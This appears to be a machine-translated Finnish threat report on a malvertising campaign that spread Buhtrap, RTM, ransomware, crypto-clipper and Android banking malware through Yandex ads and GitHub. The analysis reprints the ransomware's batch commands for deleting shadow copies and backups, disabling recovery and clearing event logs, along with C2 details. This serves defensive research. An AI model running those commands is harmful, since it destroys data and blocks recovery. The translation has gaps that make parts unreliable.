Voit kohdistaa kirjanpitäjiin kyberhyökkäyksen kohteeksi käyttämällä heidän verkosta hakemiaan työasiakirjoja. Tämä on suunnilleen sitä, mitä kyberryhmä on tehnyt viime kuukausina jakaen tunnettuja takaovia. и , sekä salauslaitteita ja ohjelmistoja kryptovaluuttojen varastamiseen. Suurin osa kohteista sijaitsee Venäjällä. Hyökkäys toteutettiin asettamalla haitallista mainontaa Yandex.Directiin. Mahdolliset uhrit ohjattiin verkkosivustolle, jossa heitä pyydettiin lataamaan haitallinen tiedosto, joka oli naamioitu asiakirjamalliksi. Yandex poisti haitallisen mainoksen varoituksemme jälkeen.
Buhtrapin lähdekoodi on vuotanut verkkoon aiemmin, joten kuka tahansa voi käyttää sitä. Meillä ei ole tietoa RTM-koodin saatavuudesta.
Tässä viestissä kerromme sinulle, kuinka hyökkääjät jakoivat haittaohjelmia Yandex.Directin avulla ja isännöivät sitä GitHubissa. Postaus päättyy haittaohjelman tekniseen analyysiin.
Buhtrap ja RTM ovat palanneet toimintaan
Leviämismekanismi ja uhrit
Uhreille toimitetuilla erilaisilla hyötykuormilla on yhteinen leviämismekanismi. Kaikki hyökkääjien luomat haitalliset tiedostot sijoitettiin kahteen eri GitHub-tietovarastoon.
Tyypillisesti arkisto sisälsi yhden ladattavan haitallisen tiedoston, joka vaihtui usein. Koska GitHub antaa sinun tarkastella arkiston muutoshistoriaa, voimme nähdä, mitä haittaohjelmia on levitetty tietyn ajanjakson aikana. Uhrin vakuuttamiseksi lataamaan haitallinen tiedosto käytettiin yllä olevassa kuvassa näkyvää verkkosivustoa blanki-shabloni24[.]ru.
Sivuston ulkoasu ja kaikkien haitallisten tiedostojen nimet noudattavat yhtä konseptia - lomakkeet, mallit, sopimukset, näytteet jne. Ottaen huomioon, että Buhtrap- ja RTM-ohjelmistoja on käytetty jo aiemmin hyökkäyksissä kirjanpitäjiä vastaan, oletimme, että strategia uudessa kampanjassa on sama. Ainoa kysymys on, kuinka uhri pääsi hyökkääjien verkkosivuille.
infektio
Ainakin useat tälle sivustolle päätyneet mahdolliset uhrit houkuttelivat haitallista mainontaa. Alla on esimerkki URL-osoitteesta:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Kuten linkistä näkyy, banneri on lähetetty lailliseen kirjanpitofoorumiin bb.f2[.]kz. On tärkeää huomata, että bannerit esiintyivät eri sivustoilla, kaikilla oli sama kampanjatunnus (blanki_rsya) ja useimmat liittyivät kirjanpito- tai oikeusapupalveluihin. URL-osoite osoittaa, että mahdollinen uhri käytti "latauslaskulomake" -pyyntöä, joka tukee hypoteesiamme kohdistetuista hyökkäyksistä. Alla on sivustot, joissa bannerit ilmestyivät, ja vastaavat hakukyselyt.
- lataa laskulomake – bb.f2[.]kz
- mallisopimus - Ipopen[.]ru
- hakemusvalitusnäyte - 77metrov[.]ru
- sopimuslomake - blank-dogovor-kupli-prodazhi[.]ru
- esimerkki tuomioistuinhakemuksesta - zen.yandex[.]ru
- näytevalitus - yurday[.]ru
- mallisopimuslomakkeet – Regforum[.]ru
- sopimuslomake – assistentus[.]ru
- malliasuntosopimus – napravah[.]com
- näytteitä laillisista sopimuksista - avito[.]ru
blanki-shabloni24[.]ru-sivusto on ehkä määritetty läpäisemään yksinkertainen visuaalinen arviointi. Yleensä mainos, joka osoittaa ammattimaisen näköiselle sivustolle, jossa on linkki GitHubiin, ei vaikuta ilmeisen pahalta. Lisäksi hyökkääjät latasivat haitallisia tiedostoja arkistoon vain rajoitetun ajan, todennäköisesti kampanjan aikana. Suurimman osan ajasta GitHub-arkisto sisälsi tyhjän zip-arkiston tai tyhjän EXE-tiedoston. Siten hyökkääjät saattoivat jakaa mainoksia Yandex.Directin kautta sivustoilla, joilla todennäköisimmin vierailivat tiettyihin hakukyselyihin tulleet kirjanpitäjät.
Seuraavaksi tarkastellaan tällä tavalla jaettuja erilaisia hyötykuormia.
Hyötykuorman analyysi
Jakelun kronologia
Haitallinen kampanja alkoi lokakuun lopussa 2018 ja on aktiivinen tätä kirjoitettaessa. Koska koko arkisto oli julkisesti saatavilla GitHubissa, laatimme tarkan aikajanan kuuden eri haittaohjelmaperheen jakelusta (katso alla oleva kuva). Olemme lisänneet rivin, joka näyttää, milloin bannerilinkki löydettiin ESET-telemetrialla mitattuna, vertailua varten Git-historian kanssa. Kuten näet, tämä korreloi hyvin GitHubin hyötykuorman saatavuuden kanssa. Helmikuun lopun ero selittyy sillä, että meillä ei ollut osaa muutoshistoriasta, koska arkisto poistettiin GitHubista ennen kuin saimme sen kokonaan käyttöön.
Kuva 1. Haittaohjelmien leviämisen kronologia.
Koodin allekirjoitussertifikaatit
Kampanjassa käytettiin useita varmenteita. Jotkut ovat allekirjoittaneet useamman kuin yhden haittaohjelmaperheen, mikä edelleen viittaa siihen, että eri näytteet kuuluivat samaan kampanjaan. Yksityisen avaimen saatavuudesta huolimatta operaattorit eivät allekirjoittaneet järjestelmällisesti binaareja eivätkä käyttäneet avainta kaikissa näytteissä. Helmikuun lopussa 2019 hyökkääjät alkoivat luoda virheellisiä allekirjoituksia käyttämällä Googlen omistamaa varmennetta, jonka yksityistä avainta heillä ei ollut.
Kaikki kampanjaan osallistuvat varmenteet ja niiden allekirjoittamat haittaohjelmaperheet on lueteltu alla olevassa taulukossa.
Olemme myös käyttäneet näitä koodin allekirjoitusvarmenteita luodaksemme linkkejä muihin haittaohjelmaperheisiin. Useimmista varmenteista emme löytäneet näytteitä, joita ei jaettu GitHub-tietovaraston kautta. TOV “MARIYA” -sertifikaattia käytettiin kuitenkin bottiverkkoon kuuluvien haittaohjelmien allekirjoittamiseen , mainosohjelmat ja kaivostyöläiset. On epätodennäköistä, että tämä haittaohjelma liittyy tähän kampanjaan. Todennäköisesti sertifikaatti ostettiin darknetistä.
Win32/Filecoder.Buhtrap
Ensimmäinen komponentti, joka kiinnitti huomiomme, oli juuri löydetty Win32/Filecoder.Buhtrap. Tämä on Delphi-binaaritiedosto, joka joskus pakataan. Sitä jaettiin pääasiassa helmi-maaliskuussa 2019. Se käyttäytyy kiristyshaittaohjelmalle sopivasti - se etsii paikallisia asemia ja verkkokansioita ja salaa löytämänsä tiedostot. Se ei tarvitse Internet-yhteyttä vaarantuakseen, koska se ei ota yhteyttä palvelimeen salausavaimien lähettämiseksi. Sen sijaan se lisää "tunnuksen" lunnasviestin loppuun ja ehdottaa sähköpostin tai Bitmessagen käyttämistä yhteyden ottamiseksi operaattoreihin.
Salatakseen mahdollisimman monia arkaluonteisia resursseja Filecoder.Buhtrap ajaa säiettä, joka on suunniteltu sulkemaan avainohjelmistot, joissa voi olla avoimia tiedostokäsittelijöitä, jotka sisältävät arvokasta tietoa, joka saattaa häiritä salausta. Kohdeprosessit ovat pääasiassa tietokannan hallintajärjestelmiä (DBMS). Lisäksi Filecoder.Buhtrap poistaa lokitiedostot ja varmuuskopiot tehdäkseen tietojen palauttamisen vaikeaksi. Voit tehdä tämän suorittamalla alla olevan eräkomentosarjan.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap käyttää laillista online-IP Logger -palvelua, joka on suunniteltu keräämään tietoja verkkosivuston vierailijoista. Tämä on tarkoitettu seuraamaan ransomwaren uhreja, joka on komentorivin vastuulla:
mshta.exe "javascript:document.write('');"
Salattavat tiedostot valitaan, jos ne eivät vastaa kolmea poissulkemisluetteloa. Ensinnäkin tiedostoja, joilla on seuraavat tunnisteet, ei salata: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys ja .bat. Toiseksi, kaikki tiedostot, joiden koko polku sisältää hakemistojonoja alla olevasta luettelosta, suljetaan pois.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Kolmanneksi myös tietyt tiedostonimet jätetään salauksen ulkopuolelle, mukaan lukien lunastusviestin tiedostonimi. Luettelo on esitetty alla. On selvää, että kaikki nämä poikkeukset on tarkoitettu koneen pitämiseen käynnissä, mutta mahdollisimman vähällä katsastuskelpoisuudella.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Tiedostojen salausjärjestelmä
Kun haittaohjelma on suoritettu, se luo 512-bittisen RSA-avainparin. Yksityinen eksponentti (d) ja moduuli (n) salataan sitten kovakoodatulla 2048-bittisellä julkisella avaimella (julkinen eksponentti ja moduuli), zlib-pakattu ja base64-koodattu. Tästä vastaava koodi on esitetty kuvassa 2.
Kuva 2. 512-bittisen RSA-avainparin luontiprosessin Hex-Rays-purkauksen tulos.
Alla on esimerkki tekstistä, jossa on luotu yksityinen avain, joka on lunnausviestiin liitetty tunnus.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Hyökkääjien julkinen avain on annettu alla.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Tiedostot salataan AES-128-CBC:llä 256-bittisellä avaimella. Jokaiselle salatulle tiedostolle luodaan uusi avain ja uusi alustusvektori. Avaintiedot lisätään salatun tiedoston loppuun. Tarkastellaanpa salatun tiedoston muotoa.
Salatuilla tiedostoilla on seuraava otsikko:
Lähdetiedoston tiedot, joihin on lisätty VEGA-maaginen arvo, salataan ensimmäiseen 0x5000 tavuun. Kaikki salauksen purkutiedot liitetään tiedostoon, jolla on seuraava rakenne:
- Tiedoston kokomerkki sisältää merkin, joka osoittaa, onko tiedosto suurempi kuin 0x5000 tavua
— AES-avainblob = ZlibCompress(RSAEncrypt(AES-avain + IV, luodun RSA-avainparin julkinen avain))
- RSA-avaimen blob = ZlibCompress(RSAEncrypt(luodettu yksityinen RSA-avain, kovakoodattu RSA-julkinen avain))
Win32/ClipBanker
Win32/ClipBanker on komponentti, jota jaettiin ajoittain lokakuun lopusta joulukuun alkuun 2018. Sen tehtävänä on valvoa leikepöydän sisältöä, se etsii kryptovaluuttalompakkojen osoitteita. Määritettyään kohdelompakkoosoitteen ClipBanker korvaa sen osoitteella, jonka uskotaan kuuluvan operaattoreille. Tutkimamme näytteet eivät olleet laatikoituja eivätkä hämäriä. Ainoa käyttäytymisen peittämiseen käytetty mekanismi on merkkijonojen salaus. Operaattorin lompakkoosoitteet salataan RC4:llä. Kohde kryptovaluutat ovat Bitcoin, Bitcoin käteinen, Dogecoin, Ethereum ja Ripple.
Sinä aikana, kun haittaohjelma levisi hyökkääjien Bitcoin-lompakoihin, VTS:lle lähetettiin pieni summa, mikä kyseenalaistaa kampanjan onnistumisen. Lisäksi ei ole näyttöä siitä, että nämä liiketoimet liittyivät ClipBankeriin ollenkaan.
Win32/RTM
Win32/RTM-komponenttia jaettiin useita päiviä maaliskuun alussa 2019. RTM on Delphissä kirjoitettu troijalainen pankkiiri, joka on suunnattu etäpankkijärjestelmiin. Vuonna 2017 ESET-tutkijat julkaisivat tämän ohjelman kuvaus on edelleen ajankohtainen. Tammikuussa 2019 myös Palo Alto Networks julkaisi .
Buhtrap Loader
GitHubissa oli jonkin aikaa saatavilla latausohjelma, joka ei ollut samanlainen kuin aiemmat Buhtrap-työkalut. Hän kääntyy puoleen https://94.100.18[.]67/RSS.php?<some_id> päästäksesi seuraavaan vaiheeseen ja lataa se suoraan muistiin. Voimme erottaa kaksi toisen vaiheen koodin käyttäytymistä. Ensimmäisessä URL-osoitteessa RSS.php ohitti Buhtrapin takaoven suoraan - tämä takaovi on hyvin samanlainen kuin se, joka oli saatavilla lähdekoodin vuotamisen jälkeen.
Mielenkiintoista on, että näemme useita kampanjoita, joissa on Buhtrap-takaovi, ja niitä väitetään hoitavan eri toimijat. Tässä tapauksessa tärkein ero on, että takaovi ladataan suoraan muistiin eikä käytä tavallista järjestelmää DLL-käyttöönottoprosessin kanssa, josta puhuimme . Lisäksi operaattorit vaihtoivat verkkoliikenteen salaamiseen käytetyn RC4-avaimen C&C-palvelimelle. Useimmissa kampanjoissa, joita olemme nähneet, operaattorit eivät vaivautuneet vaihtamaan tätä avainta.
Toinen, monimutkaisempi toimintatapa oli, että RSS.php URL välitettiin toiselle lataajalle. Se toteutti jonkin verran hämärtämistä, kuten dynaamisen tuontitaulukon uudelleenrakentamisen. Käynnistyslataimen tarkoitus on ottaa yhteyttä C&C-palvelimeen [.]com/api/F27F84EDA4D13B15/2, lähetä lokit ja odota vastausta. Se käsittelee vastauksen blobina, lataa sen muistiin ja suorittaa sen. Hyötykuorma, jonka näimme suorittamassa tätä kuormaajaa, oli sama Buhtrap-takaovi, mutta siinä saattaa olla muita komponentteja.
Android/Spy.Banker
Mielenkiintoista on, että GitHub-arkistosta löytyi myös komponentti Androidille. Hän oli pääosastolla vain yhden päivän – 1. Sen lisäksi, että ESET telemetria on julkaistu GitHubissa, se ei löydä todisteita tämän haittaohjelman levittämisestä.
Komponenttia ylläpidettiin Android-sovelluspaketina (APK). Se on pahasti hämärtynyt. Haitallinen toiminta on piilotettu APK:ssa sijaitsevaan salattuun JAR:iin. Se on salattu RC4:llä tällä avaimella:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Samaa avainta ja algoritmia käytetään merkkijonojen salaamiseen. JAR sijaitsee APK_ROOT + image/files. Tiedoston ensimmäiset 4 tavua sisältävät salatun JAR:n pituuden, joka alkaa välittömästi pituuskentän jälkeen.
Purettuamme tiedoston salauksen huomasimme, että se oli Anubis - aiemmin pankkiiri Androidille. Haittaohjelmassa on seuraavat ominaisuudet:
- mikrofonin tallennus
- ottamalla kuvakaappauksia
- saada GPS-koordinaatit
- keylogger
- laitetietojen salaus ja lunnaiden kysyntä
- roskapostia
Mielenkiintoista on, että pankkiiri käytti Twitteriä varaviestintäkanavana hankkiakseen toisen C&C-palvelimen. Analysoimamme näyte käytti @JonesTrader-tiliä, mutta se oli jo analyysihetkellä estetty.
Pankkiiri sisältää luettelon Android-laitteen kohdesovelluksista. Se on pidempi kuin Sophos-tutkimuksessa saatu luettelo. Luettelo sisältää monia pankkisovelluksia, verkkokauppaohjelmia, kuten Amazon ja eBay, sekä kryptovaluuttapalvelut.
MSIL/ClipBanker.IH
Viimeinen osana tätä kampanjaa jaettu komponentti oli .NET Windows -suoritettava tiedosto, joka ilmestyi maaliskuussa 2019. Suurin osa tutkituista versioista pakattiin ConfuserEx v1.0.0:lla. Kuten ClipBanker, tämä komponentti käyttää leikepöytää. Hänen tavoitteenaan on laaja valikoima kryptovaluuttoja sekä tarjouksia Steamissä. Lisäksi hän käyttää IP Logger -palvelua Bitcoinin yksityisen WIF-avaimen varastamiseen.
Suojausmekanismit
Sen etujen lisäksi, joita ConfuserEx tarjoaa virheenkorjauksen, polkumyynnin ja peukaloinnin estämisessä, komponentti sisältää kyvyn havaita virustentorjuntatuotteet ja virtuaalikoneet.
Vahvistaakseen, että se toimii virtuaalikoneessa, haittaohjelma pyytää sisäänrakennettua Windowsin WMI-komentoriviä (WMIC) BIOS-tietoja, nimittäin:
wmic bios
Sitten ohjelma jäsentää komennon tulosteen ja etsii avainsanoja: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Virustorjuntatuotteiden havaitsemiseksi haittaohjelma lähettää Windows Management Instrumentation (WMI) -pyynnön Windowsin suojauskeskukseen käyttämällä ManagementObjectSearcher API alla olevan kuvan mukaisesti. Base64-koodin purkamisen jälkeen puhelu näyttää tältä:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Kuva 3. Virustorjuntatuotteiden tunnistamisprosessi.
Lisäksi haittaohjelma tarkistaa, onko , työkalu, joka suojaa leikepöydän hyökkäyksiltä. Jos se on käynnissä, se keskeyttää kaikki prosessin säikeet, mikä poistaa suojauksen käytöstä.
Sitkeys
Tutkimamme haittaohjelmaversio kopioi itsensä sisään %APPDATA%googleupdater.exe ja asettaa "piilotettu"-attribuutin google-hakemistolle. Sitten hän muuttaa arvoa SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windowsin rekisterissä ja lisää polun updater.exe. Tällä tavalla haittaohjelma suoritetaan aina, kun käyttäjä kirjautuu sisään.
Haitallista käytöstä
Kuten ClipBanker, haittaohjelma tarkkailee leikepöydän sisältöä ja etsii kryptovaluuttalompakko-osoitteita, ja löydettyään korvaa sen jollakin operaattorin osoitteista. Alla on luettelo kohdeosoitteista sen perusteella, mitä koodista löytyy.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Jokaiselle osoitetyypille on vastaava säännöllinen lauseke. STEAM_URL-arvoa käytetään hyökkäämään Steam-järjestelmää vastaan, kuten voidaan nähdä puskurin määrittämiseen käytetystä säännöllisestä lausekkeesta:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Suodatuskanava
Puskurissa olevien osoitteiden korvaamisen lisäksi haittaohjelma kohdistuu Bitcoin-, Bitcoin Core- ja Electrum Bitcoin -lompakoiden yksityisiin WIF-avaimiin. Ohjelma käyttää plogger.org-osoitetta suodatuskanavana saadakseen WIF-yksityisen avaimen. Tätä varten operaattorit lisäävät yksityisen avaimen tiedot User-Agent HTTP-otsikkoon alla olevan kuvan mukaisesti.
Kuva 4. IP Logger -konsoli lähtötiedoilla.
Operaattorit eivät käyttäneet iplogger.org-sivustoa lompakoiden suodattamiseen. He todennäköisesti turvautuivat eri menetelmään kentän 255 merkin rajoituksen vuoksi User-Agentnäytetään IP Loggerin verkkoliittymässä. Tutkimissamme näytteissä toinen lähtöpalvelin oli tallennettu ympäristömuuttujaan DiscordWebHook. Yllättäen tätä ympäristömuuttujaa ei ole määritetty missään koodissa. Tämä viittaa siihen, että haittaohjelma on edelleen kehitteillä ja muuttuja on määritetty käyttäjän testikoneelle.
On toinenkin merkki siitä, että ohjelma on kehitteillä. Binaaritiedosto sisältää kaksi iplogger.org-URL-osoitetta, ja molemmille tehdään kysely, kun tietoja suodatetaan. Pyynnössä johonkin näistä URL-osoitteista Viittaus-kentän arvoa edeltää "DEV /". Löysimme myös version, jota ei ole pakattu ConfuserExillä. Tämän URL-osoitteen vastaanottaja on nimeltään DevFeedbackUrl. Ympäristömuuttujan nimen perusteella uskomme, että operaattorit aikovat käyttää laillista Discord-palvelua ja sen verkkosieppausjärjestelmää kryptovaluuttalompakoiden varastamiseen.
Johtopäätös
Tämä kampanja on esimerkki laillisten mainospalvelujen käytöstä kyberhyökkäyksissä. Järjestely kohdistuu venäläisiin organisaatioihin, mutta emme olisi yllättyneitä, jos näkisimme sellaisen hyökkäyksen käyttämällä ei-venäläisiä palveluita. Kompromissien välttämiseksi käyttäjien on oltava varmoja lataamansa ohjelmiston lähteen maineesta.
Täydellinen luettelo kompromissin ja MITER ATT&CK -attribuuttien indikaattoreista on saatavilla osoitteessa .
Lähde: will.com